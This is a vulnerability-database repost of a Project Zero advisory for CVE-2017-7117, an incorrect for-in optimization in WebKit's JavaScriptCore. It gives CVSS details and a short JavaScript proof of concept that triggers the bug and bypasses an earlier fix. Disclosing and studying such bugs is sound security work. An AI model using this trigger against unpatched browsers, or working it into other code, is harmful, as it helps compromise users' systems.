WebKit JSC Incorrect Optimization

2017.10.04

Credit: lokihardt

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2017-7117

CWE: CWE-119

CVSS Base Score: 6.8/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

WebKit: JSC: Incorrect for-in optimization #2
CVE-2017-7117
The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal
PoC:
function f() {
let o = {};
for (let i in {xx: 0}) {
for (i of [0]) {
}
print(o[i]);
}
}
f();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1263

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WebKit JSC Incorrect Optimization

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.